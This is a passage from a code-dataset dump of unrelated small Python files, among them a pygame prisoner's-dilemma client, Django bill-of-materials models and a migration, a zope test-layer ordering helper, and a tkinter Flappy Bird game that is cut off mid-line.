import Network\n\npygame.font.init()\nwidth = 700\nheight = 700\nwin = pygame.display.set_mode((width, height))\npygame.display.set_caption(\"Client\")\n\n\nclass Button:\n def __init__(self, text, x, y, color):\n self.text = text\n self.x = x\n self.y = y\n self.color = color\n self.width = 150\n self.height = 100\n\n def draw(self, win):\n pygame.draw.rect(win, self.color, (self.x, self.y, self.width, self.height))\n font = pygame.font.SysFont(\"comicsans\", 40)\n text = font.render(self.text, 1, (255, 255, 255))\n win.blit(text, (self.x + round(self.width/2) - round(text.get_width()/2), self.y + round(self.height/2) -\n round(text.get_height()/2)))\n\n def click(self, pos):\n x1 = pos[0]\n y1 = pos[1]\n if self.x <= x1 <= self.x + self.width and self.y <= y1 <= self.y + self.height:\n return True\n else:\n return False\n\n\ndef redraw_window(win, game, p, score):\n win.fill((128, 128, 128))\n\n if not(game.connected()):\n font = pygame.font.SysFont(\"comicsans\", 80)\n text = font.render(\"Waiting for Player...\", 1, (255, 0, 0), True)\n win.blit(text, (width/2 - text.get_width()/2, height/2 - text.get_height()/2))\n else:\n font = pygame.font.SysFont(\"comicsans\", 60)\n text = font.render(\"Your Move\", 1, (0, 255, 255))\n win.blit(text, (80, 300))\n\n text = font.render(\"Opponent\", 1, (0, 255, 255))\n win.blit(text, (380, 300))\n\n text = font.render(\"Your Score\", 1, (0, 255, 255))\n win.blit(text, (80, 100))\n\n text = font.render(\"Opponent\", 1, (0, 255, 255))\n win.blit(text, (380, 100))\n\n font = pygame.font.SysFont(\"comicsans\", 90)\n if p == 0:\n text_1 = font.render(\"{0}\".format(score[0]), 1, (0, 0, 255))\n text_2 = font.render(\"{0}\".format(score[1]), 1, (0, 0, 255))\n\n else:\n text_1 = font.render(\"{0}\".format(score[1]), 1, (0, 0, 255))\n text_2 = font.render(\"{0}\".format(score[0]), 1, (0, 0, 255))\n\n win.blit(text_1, (160, 185))\n win.blit(text_2, (470, 185))\n\n move1 = game.get_player_move(0)\n move2 = game.get_player_move(1)\n font = pygame.font.SysFont(\"comicsans\", 60)\n if game.both_went():\n text1 = font.render(move1, 1, (0, 0, 0))\n text2 = font.render(move2, 1, (0, 0, 0))\n else:\n if game.p1Went and p == 0:\n text1 = 
font.render(move1, 1, (0, 0, 0))\n elif game.p1Went:\n text1 = font.render(\"Locked In\", 1, (0, 0, 0))\n else:\n text1 = font.render(\"Waiting...\", 1, (0, 0, 0))\n\n if game.p2Went and p == 1:\n text2 = font.render(move2, 1, (0, 0, 0))\n elif game.p2Went:\n text2 = font.render(\"Locked In\", 1, (0, 0, 0))\n else:\n text2 = font.render(\"Waiting...\", 1, (0, 0, 0))\n\n if p == 1:\n win.blit(text2, (100, 400))\n win.blit(text1, (400, 400))\n else:\n win.blit(text1, (100, 400))\n win.blit(text2, (400, 400))\n\n for btn in btns:\n btn.draw(win)\n\n pygame.display.update()\n\n\nbtns = [Button(\"Cheat\", 100, 500, (0, 0, 0)), Button(\"Cooperate\", 410, 500, (255, 0, 0))]\n\n\ndef main():\n run = True\n clock = pygame.time.Clock()\n n = Network()\n player = int(n.get_p())\n print(\"You are player \", player)\n score = [0, 0]\n round_count = 0\n\n while run:\n clock.tick(60)\n try:\n game = n.send(\"get\")\n except:\n run = False\n print(\"Couldn't get game\")\n break\n\n if game.both_went():\n redraw_window(win, game, player, score)\n pygame.time.delay(500)\n try:\n game = n.send(\"reset\")\n except:\n run = False\n print(\"Couldn't get game\")\n break\n\n font = pygame.font.SysFont(\"comicsans\", 90)\n if game.winner() == 3 and player == 0:\n text = font.render(\"+3\", 1, (255, 0, 0))\n score[0] += 3\n score[1] -= 1\n elif game.winner() == 3 and player == 1:\n text = font.render(\"-1\", 1, (255, 0, 0))\n score[0] += 3\n score[1] -= 1\n elif game.winner() == 2:\n text = font.render(\"+2\", 1, (255, 0, 0))\n score[0] += 2\n score[1] += 2\n elif game.winner() == -1 and player == 0:\n text = font.render(\"-1\", 1, (255, 0, 0))\n score[0] -= 1\n score[1] += 3\n elif game.winner() == -1 and player == 1:\n text = font.render(\"+3\", 1, (255, 0, 0))\n score[0] -= 1\n score[1] += 3\n elif game.winner() == 0:\n text = font.render(\"+0\", 1, (255, 0, 0))\n\n round_count += 1\n\n win.blit(text, (width/2 - text.get_width()/2, height/2 - text.get_height()/2))\n pygame.display.update()\n pygame.time.delay(2000)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n pygame.quit()\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n pos = pygame.mouse.get_pos()\n for btn in btns:\n if btn.click(pos) and game.connected():\n if player == 0:\n if not game.p1Went:\n n.send(btn.text)\n else:\n if not game.p2Went:\n n.send(btn.text)\n\n if round_count == 6:\n font = pygame.font.SysFont(\"comicsans\", 40)\n if score[0] > score[1] and player == 0:\n text = font.render(\"You Won! Final score: [{0}] - [{1}]\".format(score[0], score[1]), 1, (255, 0, 0))\n elif score[0] < score[1] and player == 1:\n text = font.render(\"You Won! Final score: [{0}] - [{1}]\".format(score[1], score[0]), 1, (255, 0, 0))\n elif score[0] > score[1] and player == 1:\n text = font.render(\"You Lost! Final score: [{0}] - [{1}]\".format(score[1], score[0]), 1, (255, 0, 0))\n elif score[0] < score[1] and player == 0:\n text = font.render(\"You Lost! Final score: [{0}] - [{1}]\".format(score[0], score[1]), 1, (255, 0, 0))\n else:\n text = font.render(\"Tie Game! 
Final score: [{0}] - [{1}]\".format(score[0], score[1]), 1, (255, 0, 0))\n win.blit(text, (150, 50))\n pygame.display.update()\n pygame.time.delay(5000)\n run = False\n\n redraw_window(win, game, player, score)\n\n\ndef menu_screen():\n run = True\n clock = pygame.time.Clock()\n\n while run:\n clock.tick(60)\n win.fill((128, 128, 128))\n font = pygame.font.SysFont(\"comicsans\", 60)\n text = font.render(\"Click to Play!\", 1, (255, 0, 0))\n win.blit(text, (200, 200))\n pygame.display.update()\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n run = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n run = False\n\n main()\n\n\nwhile True:\n menu_screen()\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":7775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"294371646","text":"import pickle\r\nimport csv\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nprint(\"Read files...\")\r\niterator = pd.read_csv('data/glove.42B.300d.txt', header=None, index_col=0, \r\n delim_whitespace=True, quoting=csv.QUOTE_NONE, dtype=\"str\", chunksize=100000)\r\n\r\nwith open('dumps/word_counts.pkl', 'rb') as f:\r\n word_dict = pickle.load(f)\r\nprint(\"Done.\")\r\n\r\ndf = pd.DataFrame()\r\n\r\nwords = set(word_dict.keys())\r\n\r\ntotal = 0\r\nin_glove = 0\r\ntotal_ubuntu = len(words)\r\n\r\nprint(\"Iterating through chunks...\")\r\ndone = 0\r\n# Iterate chunk by chunk\r\nfor i in iterator:\r\n total += i.shape[0]\r\n unique_toks = set(i.index.values)\r\n in_glove += len(unique_toks.intersection(words))\r\n\r\n remain = unique_toks - words\r\n df = df.append(i.drop(remain, axis=0))\r\n done += 1\r\n print(\"Batch {} done\".format(done))\r\nprint(\"Done.\")\r\n\r\n# Print compression percentage\r\nfiltered = df.shape[0]\r\nprint(\"Kept {0:.4f}% of the rows\".format((filtered/total) * 100))\r\nprint(\"{0:.4f}% of tokens were in glove\".format(in_glove/total_ubuntu))\r\n\r\ndf.to_csv(\"data/glove_filtered.txt\", sep=\" \", header=False, index=True, quoting=csv.QUOTE_NONE)","sub_path":"src/models/glove_filter.py","file_name":"glove_filter.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"444526186","text":"##############################################################################\n# Parte do livro Introdução à Programação com Python\n# Autor: Nilo Ney Coutinho Menezes\n# Editora Novatec (c) 2010-2019\n# Primeira edição - Novembro/2010 - ISBN 978-85-7522-250-8\n# Segunda edição - Junho/2014 - ISBN 978-85-7522-408-3\n# Terceira edição - Janeiro/2019 - ISBN 978-85-7522-718-3\n# Site: http://python.nilo.pro.br/\n#\n# Arquivo: listagem3\\capítulo 10\\10.13.py\n# Descrição:\n##############################################################################\n\nfrom clientes import Cliente\nfrom bancos import Banco\nfrom contas import Conta\njoão = Cliente(\"João da Silva\", \"3241-5599\")\nmaria = Cliente(\"Maria Silva\", \"7231-9955\")\njosé = Cliente(\"José Vargas\", \"9721-3040\")\ncontaJM = Conta([joão, maria], 100)\ncontaJ = Conta([josé], 10)\ntatu = Banco(\"Tatú\")\ntatu.abre_conta(contaJM)\ntatu.abre_conta(contaJ)\ntatu.lista_contas()\n","sub_path":"capitulo 10/10.13.py","file_name":"10.13.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"528067388","text":"# coding=utf-8\n# 0wd4 - 
2015/11/15\n# python2.7\n\nimport sys\n\ndef main():\n\tcontent = sys.argv[1]\n\tcontent += '\\n'\n\n\tfile = open('diary.txt', 'a+')\n\n\tfile.write(content)\n\t\n\tfile.seek(0,0)\n\tprint(file.read())\n\n\tfile.close()\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"_src/om2py0w/0wex1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"146925538","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 21 16:32:29 2019\n\n@author: Arjun\n\"\"\"\n\nx=int(input())\nk=x\ns=0\nwhile x>1:\n if x%2==0:\n x=x/2\n s=s+1\n else:\n print(\"no\")\n break\nif (2**s)==k:\n print(\"yes\")\n","sub_path":"Python/PowOf2.py","file_name":"PowOf2.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"123582152","text":"from django.db import models\nfrom django.utils.text import slugify\nfrom django.db.models.signals import pre_save\nfrom django.core.exceptions import ValidationError\nfrom django.urls import reverse\nfrom django.conf import settings\nfrom django.contrib.contenttypes.fields import GenericRelation\nfrom django.core.validators import RegexValidator\n\n\n\n\nACTIVE='A'\nDEACTIVE='D'\nSTATUS_CHOICES = (\n (ACTIVE, 'Active'),\n (DEACTIVE, 'Deactive'),\n )\n\nclass Bom(models.Model):\n\tname \t\t\t= models.CharField(max_length=50,primary_key=True,\n\t\t\t\t\t\tvalidators=[\n\t\t\t\t\t\t\t\t\t\tRegexValidator(\n\t\t\t\t\t\t\t\t\t\t\tregex='^[\\w-]+$',\n\t\t\t\t\t\t\t\t\t\t\tmessage='Name does not allow special charecters',\n\t\t\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t])\n\tpn \t\t\t\t= models.CharField(verbose_name ='Part Number',max_length=50,blank=True, null=True,\n\t\t\t\t\t\tvalidators=[\n\t\t\t\t\t\t\t\t\t\tRegexValidator(\n\t\t\t\t\t\t\t\t\t\t\tregex='^[\\w-]+$',\n\t\t\t\t\t\t\t\t\t\t\tmessage='Part number does not allow special charecters',\n\t\t\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t])\n\trev \t\t\t= models.CharField(verbose_name ='Revision',max_length=10,blank=True, null=True)\n\ttitle \t\t\t= models.CharField(max_length=100,blank=True, null=True)\n\tslug \t\t\t= models.SlugField(unique=True,blank=True, null=True)\n\tdescription \t= models.TextField(blank=True, null=True)\n\tfg_pn \t\t\t= models.CharField(verbose_name ='Finish Goods Part Number',max_length=50,blank=True, null=True)\n\tfg_rev \t\t\t= models.CharField(verbose_name ='Finish Goods Revision',max_length=10,blank=True, null=True)\n\tcategory1 \t\t= models.CharField(max_length=50,blank=True, null=True)\n\tcategory2 \t\t= models.CharField(max_length=50,blank=True, null=True)\n\tstatus \t\t\t= models.CharField(max_length=1,choices=STATUS_CHOICES,default=ACTIVE)\n\tcreated_date \t= models.DateTimeField(auto_now_add=True)\n\tmodified_date \t= models.DateTimeField(blank=True, null=True,auto_now=True)\n\tuser \t\t\t= models.ForeignKey(settings.AUTH_USER_MODEL,\n\t\t\t\t\t\t\ton_delete=models.SET_NULL,\n\t\t\t\t\t\t\tblank=True,null=True)\n\t\n\t@property\n\tdef items_count(self):\n\t\t# c = self.weight + self.runner\n\t\treturn self.items.count()\n\titems_count.fget.short_description = \"Total Items\"\n\t\n\tdef __str__(self):\n\t\treturn self.name\n\n\tdef get_absolute_url(self):\n\t\treturn reverse('bom:detail', kwargs={'slug': self.slug})\n\n\t# def item_count(self):\n\t# \treturn self.bom_detail_set.count()\n\ndef create_bom_slug(instance, new_slug=None):\n # import datetime\n default_slug = '%s' % (instance.name)\n slug = 
slugify(default_slug)\n if new_slug is not None:\n slug = new_slug\n qs = Bom.objects.filter(slug=slug)\n exists = qs.exists()\n if exists:\n new_slug = \"%s-%s\" %(slug,qs.count())\n return create_bom_slug(instance, new_slug=new_slug)\n return slug\n\ndef pre_save_bom_receiver(sender, instance, *args, **kwargs):\n\tif not instance.slug:\n\t\tinstance.slug = create_bom_slug(instance)\n\npre_save.connect(pre_save_bom_receiver, sender=Bom)\n\n\n\n\nPART_TYPE_CHOICE = (\n\t\t('COMPONENT','Component'),\n\t\t('MODULE','Module with serial number'),\n\t\t('BUILD','Inernal Build with serial number')\n\t)\n\nPACKAGE_FAMILY_CHOICE = (\n\t\t('IP','Through-hole'),\n\t\t('SFM','Surface mount'),\n\t\t('CC','Chip carrier'),\n\t\t('PGA','Pin grid arrays'),\n\t\t('FP','Flat packages'),\n\t\t('SOP','Small outline packages'),\n\t\t('CSP','Chip-scale packages'),\n\t\t('BGA','Ball grid array'),\n\t\t('OTHER','Transistor, diode, small-pin-count IC packages'),\n\t)\n\nclass Bom_Detail(models.Model):\n\trd \t\t\t\t= models.CharField(verbose_name ='Ref Destinator',max_length=50,\n\t\t\t\t\t\tvalidators=[\n\t\t\t\t\t\t\t\t\t\tRegexValidator(\n\t\t\t\t\t\t\t\t\t\t\tregex='^[\\w-]+$',\n\t\t\t\t\t\t\t\t\t\t\tmessage='RD does not allow special charecters',\n\t\t\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t])\n\tpn \t\t\t\t= models.CharField(verbose_name ='Part Number',max_length=50,\n\t\t\t\t\t\tvalidators=[\n\t\t\t\t\t\t\t\t\t\tRegexValidator(\n\t\t\t\t\t\t\t\t\t\t\tregex='^[\\w-]+$',\n\t\t\t\t\t\t\t\t\t\t\tmessage='Part number does not allow special charecters',\n\t\t\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t])\n\tcustomer_pn \t= models.CharField(verbose_name ='Customer Part Number',max_length=50,blank=True, null=True)\n\tpn_type\t\t\t= models.CharField(verbose_name ='Part Type',max_length=10,choices=PART_TYPE_CHOICE,default='COMPONENT')\n\tbom \t\t\t= models.ForeignKey(Bom,\n\t\t\t\t\t\t\t\ton_delete=models.CASCADE,\n\t\t\t\t\t\t\t\trelated_name='items')\n\ttitle \t\t\t= models.CharField(max_length=100,blank=True, null=True)\n\tslug \t\t\t= models.SlugField(unique=True,blank=True, null=True)\n\tdescription \t= models.TextField(max_length=255,blank=True, null=True)\n\tcategory1 \t\t= models.CharField(max_length=50,blank=True, null=True)\n\tcategory2 \t\t= models.CharField(max_length=50,blank=True, null=True)\n\tcritical \t\t= models.BooleanField(default=False)\n\tpin \t\t\t= models.IntegerField(default = 1)\n\tthickness \t\t= models.DecimalField(max_digits = 5,decimal_places = 2, default=0.18)\n\tpackage \t\t= models.CharField(max_length=20,blank=True, null=True)\n\tpackage_family \t= models.CharField(max_length=10,choices=PACKAGE_FAMILY_CHOICE,default='SFM')\n\tstatus \t\t\t= models.CharField(max_length=1,choices=STATUS_CHOICES,default=ACTIVE)\n\tcreated_date \t= models.DateTimeField(auto_now_add=True)\n\tmodified_date \t= models.DateTimeField(blank=True, null=True,auto_now=True)\n\tuser \t\t\t= models.ForeignKey(settings.AUTH_USER_MODEL,\n\t\t\t\t\t\ton_delete=models.SET_NULL,\n\t\t\t\t\t\tblank=True,null=True)\n\t\n\tclass Meta:\n\t\tunique_together = ('rd','pn','bom')\n\n\tdef __str__(self):\n\t\treturn ('%s : %s' % (self.rd,self.pn))\n\n\tdef get_absolute_url(self):\n\t\treturn reverse('bom:item-detail', kwargs={'slug': self.slug})\n\ndef create_bom_detail_slug(instance, new_slug=None):\n # import datetime\n default_slug = '%s-%s-%s' % (instance.bom,instance.pn,instance.rd)\n slug = slugify(default_slug)\n if new_slug is not None:\n slug = new_slug\n qs = Bom_Detail.objects.filter(slug=slug)\n exists = qs.exists()\n if exists:\n 
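# a record with this slug already exists; suffix the queryset count to keep slugs unique\n 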
new_slug = \"%s-%s\" %(slug,qs.count())\n return pre_save_bom_detail_receiver(instance, new_slug=new_slug)\n return slug\n\ndef pre_save_bom_detail_receiver(sender, instance, *args, **kwargs):\n\tif not instance.slug:\n\t\tinstance.slug = create_bom_detail_slug(instance)\n\npre_save.connect(pre_save_bom_detail_receiver, sender=Bom_Detail)\n\n\n\nclass Alternate_Part(models.Model):\n\tbom_detail \t\t= models.ForeignKey(Bom_Detail,\n\t\t\t\t\t\ton_delete=models.CASCADE,\n\t\t\t\t\t\trelated_name='alternates')\n\tpn \t\t\t\t= models.CharField(verbose_name ='Part Number',max_length=50)\n\tcustomer_pn \t= models.CharField(max_length=50,blank=True, null=True)\n\tordered \t\t= models.IntegerField(default=1)\n\ttitle \t\t\t= models.CharField(max_length=100,blank=True, null=True)\n\tdescription \t= models.TextField(max_length=255,blank=True, null=True)\n\tcategory1 \t\t= models.CharField(max_length=50,blank=True, null=True)\n\tcategory2 \t\t= models.CharField(max_length=50,blank=True, null=True)\n\tstatus \t\t\t= models.CharField(max_length=1,choices=STATUS_CHOICES,default=ACTIVE)\n\tcreated_date \t= models.DateTimeField(auto_now_add=True)\n\tmodified_date \t= models.DateTimeField(blank=True, null=True,auto_now=True)\n\tuser \t\t\t= models.ForeignKey(settings.AUTH_USER_MODEL,\n\t\t\t\t\t\ton_delete=models.SET_NULL,\n\t\t\t\t\t\tblank=True,null=True)\n\n\tdef __str__(self):\n\t\treturn ('%s : %s' % (self.bom_detail,self.pn))","sub_path":"wmp/bom/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"654066968","text":"from zope.testing.testrunner.find import name_from_layer\n\n\ndef order_by_bases(layers):\n \"\"\"Order the layers from least to most specific (bottom to top)\n\n >>> class TestLayer(object):\n ... def __init__(self, bases, name):\n ... self.__bases__ = bases\n ... self.__name__ = name\n ... def __repr__(self):\n ... 
return self.__name__\n\n A layer without any base:\n\n >>> zero = TestLayer(bases=(), name='zero')\n\n A layer with a single base:\n\n >>> one = TestLayer(bases=(zero, ), name='one')\n\n Less specific comes first:\n\n >>> order_by_bases([one, zero])\n [zero, one]\n >>> order_by_bases([zero, one])\n [zero, one]\n\n\n Another layer with a single base:\n\n >>> one_bis = TestLayer(bases=(zero, ), name='one_bis')\n\n Less specific comes first:\n\n >>> order_by_bases([one, zero, one_bis])\n [zero, one, one_bis]\n\n Order of layers of identical specificity does not depend\n on their order in the input:\n\n >>> order_by_bases([one_bis, zero, one])\n [zero, one, one_bis]\n >>> order_by_bases([one_bis, one, zero])\n [zero, one, one_bis]\n >>> order_by_bases([zero, one_bis, one])\n [zero, one, one_bis]\n\n Another layer with a single base:\n\n >>> one_ter = TestLayer(bases=(zero, ), name='one_ter')\n\n Less specific still comes first:\n\n >>> order_by_bases([one_bis, one_ter, one, zero])\n [zero, one, one_bis, one_ter]\n\n Order of layers of identical specificity does still not depend\n on their order in the input:\n\n >>> order_by_bases([one_ter, one_bis, one, zero])\n [zero, one, one_bis, one_ter]\n >>> order_by_bases([zero, one_ter, one_bis, one])\n [zero, one, one_bis, one_ter]\n\n A layer with two bases of different specificity:\n\n >>> two = TestLayer(bases=(zero, one), name='two')\n\n Ordered by inverse specificity:\n\n >>> order_by_bases([two, one, zero])\n [zero, one, two]\n >>> order_by_bases([zero, two, one])\n [zero, one, two]\n >>> order_by_bases([two, zero, one])\n [zero, one, two]\n\n Another layer with two bases of different specificity:\n\n >>> two_bis = TestLayer(bases=(zero, one_bis), name='two_bis')\n\n >>> order_by_bases([two, two_bis, one, zero])\n [zero, one, two, two_bis]\n >>> order_by_bases([two_bis, two, one, zero])\n [zero, one, two, two_bis]\n\n >>> order_by_bases([one_bis, two_bis, two, one, zero])\n [zero, one, one_bis, two, two_bis]\n\n >>> three = TestLayer(bases=(one_bis, two), name='three')\n\n >>> order_by_bases([one_bis, two_bis, three, two, one, zero])\n [zero, one, one_bis, two, two_bis, three]\n >>> order_by_bases([three, one_bis, two_bis, two, one, zero])\n [zero, one, one_bis, two, two_bis, three]\n >>> order_by_bases([one_bis, three, two_bis, two, one, zero])\n [zero, one, one_bis, two, two_bis, three]\n >>> order_by_bases([one_bis, two_bis, two, three, one, zero])\n [zero, one, one_bis, two, two_bis, three]\n\n Another layer without any base:\n\n >>> other_zero = TestLayer(bases=(), name='other_zero')\n\n >>> order_by_bases([other_zero, zero])\n [other_zero, zero]\n >>> order_by_bases([zero, other_zero])\n [other_zero, zero]\n\n Another layer with this new base:\n\n >>> other_one = TestLayer(bases=(other_zero, ), name='other_one')\n\n >>> order_by_bases([one, other_one])\n [one, other_one]\n >>> order_by_bases([one, other_one])\n [one, other_one]\n\n A layer with the two bases:\n\n >>> both_one = TestLayer(bases=(zero, other_zero, ), name='both_one')\n\n >>> order_by_bases([one, other_one, both_one])\n [one, other_one, both_one]\n >>> order_by_bases([one, other_one, both_one])\n [one, other_one, both_one]\n >>> order_by_bases([both_one, one, other_one])\n [one, other_one, both_one]\n >>> order_by_bases([one, both_one, other_one])\n [one, other_one, both_one]\n\n Another layer with the two bases:\n\n >>> both_one_bis = TestLayer(bases=(zero, other_zero, ),\n ... 
name='both_one_bis')\n\n >>> order_by_bases([both_one_bis, one, other_one, both_one])\n [one, other_one, both_one, both_one_bis]\n >>> order_by_bases([one, both_one_bis, other_one, both_one])\n [one, other_one, both_one, both_one_bis]\n >>> order_by_bases([both_one, one, both_one_bis, other_one])\n [one, other_one, both_one, both_one_bis]\n >>> order_by_bases([one, both_one, other_one, both_one_bis])\n [one, other_one, both_one, both_one_bis]\n\n Let's use a layer of specificity two:\n\n >>> order_by_bases([two, both_one_bis, one, other_one, both_one])\n [one, other_one, both_one, both_one_bis, two]\n >>> order_by_bases([one, two, both_one_bis, other_one, both_one])\n [one, other_one, both_one, both_one_bis, two]\n >>> order_by_bases([both_one, one, two, both_one_bis, other_one])\n [one, other_one, both_one, both_one_bis, two]\n >>> order_by_bases([one, both_one, two, other_one, both_one_bis])\n [one, other_one, both_one, both_one_bis, two]\n\n Another layer of specificity two:\n\n >>> other_two = TestLayer(bases=(other_one, ), name='other_two')\n\n >>> order_by_bases([other_two, two, both_one_bis, one, other_one, both_one])\n [one, other_one, both_one, both_one_bis, other_two, two]\n >>> order_by_bases([one, other_two, two, both_one_bis, other_one, both_one])\n [one, other_one, both_one, both_one_bis, other_two, two]\n >>> order_by_bases([one, both_one, other_two, two, other_one, both_one_bis])\n [one, other_one, both_one, both_one_bis, other_two, two]\n >>> order_by_bases([both_one, one, two, other_two, both_one_bis, other_one])\n [one, other_one, both_one, both_one_bis, other_two, two]\n\n \"\"\"\n named_layers = [(name_from_layer(layer), layer) for layer in layers]\n named_layers.sort()\n # Store layers along with their specificity measured by numbers of\n # sublayers.\n all_layers = {}\n for name, layer in named_layers:\n gathered = []\n gather_layers(layer, gathered)\n index = len(gathered)\n some_layers = all_layers.setdefault(index, [])\n some_layers.append(gathered)\n keys = all_layers.keys()\n keys.sort()\n # Gather them all starting by the least specific.\n gathered = []\n for key in keys:\n for some_layers in all_layers[key]:\n gathered.extend(some_layers)\n seen = {}\n result = []\n for layer in gathered:\n if layer not in seen:\n seen[layer] = 1\n if layer in layers:\n result.append(layer)\n return result\n\n\ndef gather_layers(layer, result):\n if layer is not object:\n result.append(layer)\n for b in layer.__bases__:\n gather_layers(b, result)\n","sub_path":"zope.testing/branches/gotcha-test-layers/src/zope/testing/testrunner/layerutils.py","file_name":"layerutils.py","file_ext":"py","file_size_in_byte":6621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"585775104","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Account',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('code', models.CharField(max_length=10, null=True, blank=True)),\n ('name', models.CharField(max_length=100)),\n ('current_dr', models.FloatField(null=True, blank=True)),\n ('current_cr', models.FloatField(null=True, blank=True)),\n ('tax_rate', models.FloatField(null=True, blank=True)),\n ('opening_dr', models.FloatField(default=0)),\n ('opening_cr', models.FloatField(default=0)),\n ],\n ),\n 
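# Category carries MPTT-style tree columns (lft/rght/tree_id/level)\n 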
migrations.CreateModel(\n name='Category',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=50)),\n ('description', models.CharField(max_length=254, null=True, blank=True)),\n ('lft', models.PositiveIntegerField(editable=False, db_index=True)),\n ('rght', models.PositiveIntegerField(editable=False, db_index=True)),\n ('tree_id', models.PositiveIntegerField(editable=False, db_index=True)),\n ('level', models.PositiveIntegerField(editable=False, db_index=True)),\n ],\n options={\n 'verbose_name_plural': 'Categories',\n },\n ),\n migrations.CreateModel(\n name='JournalEntry',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('date', models.DateField()),\n ('object_id', models.PositiveIntegerField()),\n ],\n options={\n 'verbose_name_plural': 'Journal Entries',\n },\n ),\n migrations.CreateModel(\n name='Party',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=254)),\n ('name_en', models.CharField(max_length=254, null=True)),\n ('name_ne', models.CharField(max_length=254, null=True)),\n ('address', models.TextField(null=True, blank=True)),\n ('phone_no', models.CharField(max_length=100, null=True, blank=True)),\n ('pan_no', models.CharField(max_length=50, null=True, verbose_name=b'Tax Reg. No.', blank=True)),\n ('type', models.CharField(default=b'Customer/Supplier', max_length=17, choices=[(b'Customer', b'Customer'), (b'Supplier', b'Supplier'), (b'Customer/Supplier', b'Customer/Supplier')])),\n ('account', models.ForeignKey(to='ledger.Account', null=True)),\n ],\n options={\n 'verbose_name_plural': 'Parties',\n },\n ),\n migrations.CreateModel(\n name='Transaction',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('dr_amount', models.FloatField(null=True, blank=True)),\n ('cr_amount', models.FloatField(null=True, blank=True)),\n ('current_dr', models.FloatField(null=True, blank=True)),\n ('current_cr', models.FloatField(null=True, blank=True)),\n ('account', models.ForeignKey(to='ledger.Account')),\n ('journal_entry', models.ForeignKey(related_name='transactions', to='ledger.JournalEntry')),\n ],\n ),\n ]\n","sub_path":"apps/ledger/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"564434936","text":"from tkinter import *\r\nimport random\r\n\r\nt = Tk()\r\nclock = 0\r\nvelocity = 25\r\nobstacleslist = []\r\nchecklist = []\r\nscore = 0\r\n\r\ndef drawcircle(canv,x,y,rad):\r\n return canv.create_oval(x-rad,y-rad,x+rad,y+rad,width=0,fill='yellow')\r\n\r\ndef spawnobstacle():\r\n global c\r\n global obstacleslist\r\n global checklist\r\n \r\n hole_position = random.randint(100, 600)\r\n top_rectangle = c.create_rectangle(1201, 0 - 1000, 1201 + 50, hole_position - 75, fill='green', outline='green')\r\n bot_rectangle = c.create_rectangle(1201, 800, 1201 + 50, hole_position + 75, fill='green', outline='green')\r\n obstacleslist += [top_rectangle]\r\n checklist += [top_rectangle]\r\n obstacleslist += [bot_rectangle]\r\n checklist += [bot_rectangle]\r\n\r\ndef moveobjects():\r\n global c\r\n global circle\r\n global velocity\r\n global clock\r\n global obstacleslist\r\n global checklist\r\n global label\r\n \r\n 
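# step the bird vertically by the current velocity (canvas y grows downward)\r\n 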
c.move(circle, 0, -0.2*velocity)\r\n velocity -= 1\r\n\r\n if c.coords(circle)[1] < 0:\r\n if velocity > 0:\r\n velocity = -1\r\n else:\r\n velocity -= 1\r\n if c.coords(circle)[1] > 750:\r\n velocity = 0\r\n\r\n collided = False\r\n for rect in obstacleslist:\r\n c.move(rect, -3, 0)\r\n for rect in list(checklist): # iterate over a copy; overlap() can remove passed rects\r\n if overlap(circle, rect):\r\n c.itemconfig(rect, fill='red', outline='red')\r\n collided = True\r\n\r\n clock += 1\r\n if clock % 150 == 0:\r\n spawnobstacle()\r\n\r\n if not collided:\r\n c.after(15, moveobjects)\r\n else:\r\n label['text'] = \"Game Over! \" + label['text'] \r\n\r\ndef overlap(circle, rect):\r\n global c\r\n global clock\r\n global score\r\n global checklist\r\n global label\r\n \r\n if coords(rect)[2] < coords(circle)[0]:\r\n score += 0.5\r\n if score % 1 == 0:\r\n label['text'] = \"score: \" + str(int(score))\r\n del checklist[checklist.index(rect)]\r\n \r\n return (bpx(coords(rect)[0], coords(rect)[2], coords(circle)[0]) or bpx(coords(rect)[0], coords(rect)[2], coords(circle)[2])) and 